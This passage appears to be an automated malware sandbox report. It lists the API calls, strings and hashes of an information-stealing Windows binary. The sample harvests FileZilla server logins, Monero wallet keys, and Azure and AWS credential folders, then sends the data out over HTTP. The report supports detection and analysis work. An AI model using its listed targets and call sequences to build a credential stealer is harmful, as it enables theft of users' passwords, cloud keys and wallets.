                                          • Part of subcall function 00A58E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00A58E52
                                        • GetProcessHeap.KERNEL32(00000000,000F423F,00A60DBA,00A60DB7,00A60DB6,00A60DB3), ref: 00A50362
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00A50369
                                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 00A50385
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A60DB2), ref: 00A50393
                                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 00A503CF
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A60DB2), ref: 00A503DD
                                        • StrStrA.SHLWAPI(00000000,<User>), ref: 00A50419
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A60DB2), ref: 00A50427
                                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00A50463
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A60DB2), ref: 00A50475
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A60DB2), ref: 00A50502
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A60DB2), ref: 00A5051A
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A60DB2), ref: 00A50532
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A60DB2), ref: 00A5054A
                                        • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00A50562
                                        • lstrcat.KERNEL32(?,profile: null), ref: 00A50571
                                        • lstrcat.KERNEL32(?,url: ), ref: 00A50580
                                        • lstrcat.KERNEL32(?,00000000), ref: 00A50593
                                        • lstrcat.KERNEL32(?,00A61678), ref: 00A505A2
                                        • lstrcat.KERNEL32(?,00000000), ref: 00A505B5
                                        • lstrcat.KERNEL32(?,00A6167C), ref: 00A505C4
                                        • lstrcat.KERNEL32(?,login: ), ref: 00A505D3
                                        • lstrcat.KERNEL32(?,00000000), ref: 00A505E6
                                        • lstrcat.KERNEL32(?,00A61688), ref: 00A505F5
                                        • lstrcat.KERNEL32(?,password: ), ref: 00A50604
                                        • lstrcat.KERNEL32(?,00000000), ref: 00A50617
                                        • lstrcat.KERNEL32(?,00A61698), ref: 00A50626
                                        • lstrcat.KERNEL32(?,00A6169C), ref: 00A50635
                                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A60DB2), ref: 00A5068E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                        • API String ID: 1942843190-555421843
                                        • Opcode ID: 9af844053a8bd21da32b882b02ec9f38b9d7944c4b8520f0cbb0649da9249352
                                        • Instruction ID: 95d9bec30c8bf67e7bd831f126e2bf4f530d225f62d70d0a33f51c3843bcce3b
                                        • Opcode Fuzzy Hash: 9af844053a8bd21da32b882b02ec9f38b9d7944c4b8520f0cbb0649da9249352
                                        • Instruction Fuzzy Hash: 1AD15375A00108ABDB04EBF0DE96EEE7778FF24301F544519F902B6191EF74AA0ACB65
                                        Function 00A45960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00A5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A5A7E6
                                          • Part of subcall function 00A447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00A44839
                                          • Part of subcall function 00A447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00A44849
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00A459F8
                                        • StrCmpCA.SHLWAPI(?,0160E9B0), ref: 00A45A13
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00A45B93
                                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0160E9E0,00000000,?,0160AAB8,00000000,?,00A61A1C), ref: 00A45E71
                                        • lstrlen.KERNEL32(00000000), ref: 00A45E82
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00A45E93
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00A45E9A
                                        • lstrlen.KERNEL32(00000000), ref: 00A45EAF
                                        • lstrlen.KERNEL32(00000000), ref: 00A45ED8
                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00A45EF1
                                        • lstrlen.KERNEL32(00000000,?,?), ref: 00A45F1B
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00A45F2F
                                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00A45F4C
                                        • InternetCloseHandle.WININET(00000000), ref: 00A45FB0
                                        • InternetCloseHandle.WININET(00000000), ref: 00A45FBD
                                        • HttpOpenRequestA.WININET(00000000,0160EB70,?,0160E578,00000000,00000000,00400100,00000000), ref: 00A45BF8
                                          • Part of subcall function 00A5A9B0: lstrlen.KERNEL32(?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A5A9C5
                                          • Part of subcall function 00A5A9B0: lstrcpy.KERNEL32(00000000), ref: 00A5AA04
                                          • Part of subcall function 00A5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A5AA12
                                          • Part of subcall function 00A5A8A0: lstrcpy.KERNEL32(?,00A60E17), ref: 00A5A905
                                          • Part of subcall function 00A5A920: lstrcpy.KERNEL32(00000000,?), ref: 00A5A972
                                          • Part of subcall function 00A5A920: lstrcat.KERNEL32(00000000), ref: 00A5A982
                                        • InternetCloseHandle.WININET(00000000), ref: 00A45FC7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                        • String ID: "$"$------$------$------
                                        • API String ID: 874700897-2180234286
                                        • Opcode ID: 9f5081046a23e3f0aaf2e44d3cb3927d657301d125e52a8c4e8da405a4a9e903
                                        • Instruction ID: eb489b15b6f8048cfd3f71d54996dc421629836a3314f92ee02c04078b7d464f
                                        • Opcode Fuzzy Hash: 9f5081046a23e3f0aaf2e44d3cb3927d657301d125e52a8c4e8da405a4a9e903
                                        • Instruction Fuzzy Hash: 58121072A20128EBDB15EBA0DD95FEEB378BF64701F404299F50662091EF702A4DCF65
                                        Function 00A4CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                          • Part of subcall function 00A5A9B0: lstrlen.KERNEL32(?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A5A9C5
                                          • Part of subcall function 00A5A9B0: lstrcpy.KERNEL32(00000000), ref: 00A5AA04
                                          • Part of subcall function 00A5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A5AA12
                                          • Part of subcall function 00A5A8A0: lstrcpy.KERNEL32(?,00A60E17), ref: 00A5A905
                                          • Part of subcall function 00A58B60: GetSystemTime.KERNEL32(00A60E1A,0160A9C8,00A605AE,?,?,00A413F9,?,0000001A,00A60E1A,00000000,?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A58B86
                                          • Part of subcall function 00A5A920: lstrcpy.KERNEL32(00000000,?), ref: 00A5A972
                                          • Part of subcall function 00A5A920: lstrcat.KERNEL32(00000000), ref: 00A5A982
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00A4CF83
                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00A4D0C7
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00A4D0CE
                                        • lstrcat.KERNEL32(?,00000000), ref: 00A4D208
                                        • lstrcat.KERNEL32(?,00A61478), ref: 00A4D217
                                        • lstrcat.KERNEL32(?,00000000), ref: 00A4D22A
                                        • lstrcat.KERNEL32(?,00A6147C), ref: 00A4D239
                                        • lstrcat.KERNEL32(?,00000000), ref: 00A4D24C
                                        • lstrcat.KERNEL32(?,00A61480), ref: 00A4D25B
                                        • lstrcat.KERNEL32(?,00000000), ref: 00A4D26E
                                        • lstrcat.KERNEL32(?,00A61484), ref: 00A4D27D
                                        • lstrcat.KERNEL32(?,00000000), ref: 00A4D290
                                        • lstrcat.KERNEL32(?,00A61488), ref: 00A4D29F
                                        • lstrcat.KERNEL32(?,00000000), ref: 00A4D2B2
                                        • lstrcat.KERNEL32(?,00A6148C), ref: 00A4D2C1
                                        • lstrcat.KERNEL32(?,00000000), ref: 00A4D2D4
                                        • lstrcat.KERNEL32(?,00A61490), ref: 00A4D2E3
                                          • Part of subcall function 00A5A820: lstrlen.KERNEL32(00A44F05,?,?,00A44F05,00A60DDE), ref: 00A5A82B
                                          • Part of subcall function 00A5A820: lstrcpy.KERNEL32(00A60DDE,00000000), ref: 00A5A885
                                        • lstrlen.KERNEL32(?), ref: 00A4D32A
                                        • lstrlen.KERNEL32(?), ref: 00A4D339
                                          • Part of subcall function 00A5AA70: StrCmpCA.SHLWAPI(01609038,00A4A7A7,?,00A4A7A7,01609038), ref: 00A5AA8F
                                        • DeleteFileA.KERNEL32(00000000), ref: 00A4D3B4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                        • String ID:
                                        • API String ID: 1956182324-0
                                        • Opcode ID: ce088abe1787bee8ebcdc65a6e0c2a96410286ea73818114e53c3a308ba2c65d
                                        • Instruction ID: 6d1cdfea92528cca073fb18fece19d3c2996120b5cc74eebb9e7e6bb83240594
                                        • Opcode Fuzzy Hash: ce088abe1787bee8ebcdc65a6e0c2a96410286ea73818114e53c3a308ba2c65d
                                        • Instruction Fuzzy Hash: 5DE13371A10108ABDB04EBA0DE96FEE7778BF64302F504255F507B7091EE35AE09CB66
                                        Function 00A4C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                          • Part of subcall function 00A5A920: lstrcpy.KERNEL32(00000000,?), ref: 00A5A972
                                          • Part of subcall function 00A5A920: lstrcat.KERNEL32(00000000), ref: 00A5A982
                                          • Part of subcall function 00A5A8A0: lstrcpy.KERNEL32(?,00A60E17), ref: 00A5A905
                                          • Part of subcall function 00A5A9B0: lstrlen.KERNEL32(?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A5A9C5
                                          • Part of subcall function 00A5A9B0: lstrcpy.KERNEL32(00000000), ref: 00A5AA04
                                          • Part of subcall function 00A5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A5AA12
                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0160D530,00000000,?,00A6144C,00000000,?,?), ref: 00A4CA6C
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00A4CA89
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00A4CA95
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00A4CAA8
                                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00A4CAD9
                                        • StrStrA.SHLWAPI(?,0160D680,00A60B52), ref: 00A4CAF7
                                        • StrStrA.SHLWAPI(00000000,0160D608), ref: 00A4CB1E
                                        • StrStrA.SHLWAPI(?,0160DDC0,00000000,?,00A61458,00000000,?,00000000,00000000,?,01609008,00000000,?,00A61454,00000000,?), ref: 00A4CCA2
                                        • StrStrA.SHLWAPI(00000000,0160DCC0), ref: 00A4CCB9
                                          • Part of subcall function 00A4C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00A4C871
                                          • Part of subcall function 00A4C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00A4C87C
                                        • StrStrA.SHLWAPI(?,0160DCC0,00000000,?,00A6145C,00000000,?,00000000,01609018), ref: 00A4CD5A
                                        • StrStrA.SHLWAPI(00000000,016091C8), ref: 00A4CD71
                                          • Part of subcall function 00A4C820: lstrcat.KERNEL32(?,00A60B46), ref: 00A4C943
                                          • Part of subcall function 00A4C820: lstrcat.KERNEL32(?,00A60B47), ref: 00A4C957
                                          • Part of subcall function 00A4C820: lstrcat.KERNEL32(?,00A60B4E), ref: 00A4C978
                                        • lstrlen.KERNEL32(00000000), ref: 00A4CE44
                                        • CloseHandle.KERNEL32(00000000), ref: 00A4CE9C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                        • String ID:
                                        • API String ID: 3744635739-3916222277
                                        • Opcode ID: 5e768593869e67dcceb00b237cacc86ed3ad6bd6f5fff56b8f7a93fe838e4975
                                        • Instruction ID: 669830d72fefa2c406c911aa21334539ecf1a49067daf53fb9aa1bdfa86a1a87
                                        • Opcode Fuzzy Hash: 5e768593869e67dcceb00b237cacc86ed3ad6bd6f5fff56b8f7a93fe838e4975
                                        • Instruction Fuzzy Hash: C5E10072A00108ABDB14EBA4DD96FEEB778BF64301F404259F50667191EF306A4ECF66
                                        Function 00A58320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                        • RegOpenKeyExA.ADVAPI32(00000000,0160B228,00000000,00020019,00000000,00A605B6), ref: 00A583A4
                                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00A58426
                                        • wsprintfA.USER32 ref: 00A58459
                                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00A5847B
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00A5848C
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00A58499
                                          • Part of subcall function 00A5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A5A7E6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpenlstrcpy$Enumwsprintf
                                        • String ID: - $%s\%s$?
                                        • API String ID: 3246050789-3278919252
                                        • Opcode ID: 7d42233a91709efed043f3105421511192cb6aa61e4c847410fddfc4e6e3e2b2
                                        • Instruction ID: 0d58ce5a67f6b5a004b07e123bbe60c9f3f5bb1ae35e0e377eeb604ea4893f9c
                                        • Opcode Fuzzy Hash: 7d42233a91709efed043f3105421511192cb6aa61e4c847410fddfc4e6e3e2b2
                                        • Instruction Fuzzy Hash: 70812C71A1011CABEB24DB50CD91FEEB7B8FF18701F008699E509A6180DF756B89CFA5
                                        Function 00A54D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00A58DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00A58E0B
                                        • lstrcat.KERNEL32(?,00000000), ref: 00A54DB0
                                        • lstrcat.KERNEL32(?,\.azure\), ref: 00A54DCD
                                          • Part of subcall function 00A54910: wsprintfA.USER32 ref: 00A5492C
                                          • Part of subcall function 00A54910: FindFirstFileA.KERNEL32(?,?), ref: 00A54943
                                        • lstrcat.KERNEL32(?,00000000), ref: 00A54E3C
                                        • lstrcat.KERNEL32(?,\.aws\), ref: 00A54E59
                                          • Part of subcall function 00A54910: StrCmpCA.SHLWAPI(?,00A60FDC), ref: 00A54971
                                          • Part of subcall function 00A54910: StrCmpCA.SHLWAPI(?,00A60FE0), ref: 00A54987
                                          • Part of subcall function 00A54910: FindNextFileA.KERNEL32(000000FF,?), ref: 00A54B7D
                                          • Part of subcall function 00A54910: FindClose.KERNEL32(000000FF), ref: 00A54B92
                                        • lstrcat.KERNEL32(?,00000000), ref: 00A54EC8
                                        • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00A54EE5
                                          • Part of subcall function 00A54910: wsprintfA.USER32 ref: 00A549B0
                                          • Part of subcall function 00A54910: StrCmpCA.SHLWAPI(?,00A608D2), ref: 00A549C5
                                          • Part of subcall function 00A54910: wsprintfA.USER32 ref: 00A549E2
                                          • Part of subcall function 00A54910: PathMatchSpecA.SHLWAPI(?,?), ref: 00A54A1E
                                          • Part of subcall function 00A54910: lstrcat.KERNEL32(?,0160EAF0), ref: 00A54A4A
                                          • Part of subcall function 00A54910: lstrcat.KERNEL32(?,00A60FF8), ref: 00A54A5C
                                          • Part of subcall function 00A54910: lstrcat.KERNEL32(?,?), ref: 00A54A70
                                          • Part of subcall function 00A54910: lstrcat.KERNEL32(?,00A60FFC), ref: 00A54A82
                                          • Part of subcall function 00A54910: lstrcat.KERNEL32(?,?), ref: 00A54A96
                                          • Part of subcall function 00A54910: CopyFileA.KERNEL32(?,?,00000001), ref: 00A54AAC
                                          • Part of subcall function 00A54910: DeleteFileA.KERNEL32(?), ref: 00A54B31
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                        • API String ID: 949356159-974132213
                                        • Opcode ID: f82836021e36ce3d090cf00c6ecc03e0d34688a7d521a45ea78991ab66325754
                                        • Instruction ID: 23e6649aacf4dbebbb05ebbc744c4934b19368b773e9b60b2e6d8843a13263e4
                                        • Opcode Fuzzy Hash: f82836021e36ce3d090cf00c6ecc03e0d34688a7d521a45ea78991ab66325754
                                        • Instruction Fuzzy Hash: 5B4171BAA4020467DB10F770ED47FED7638BB64701F404994B689660C1FEB55BCD8BA2
                                        Function 00A59010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00A5906C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
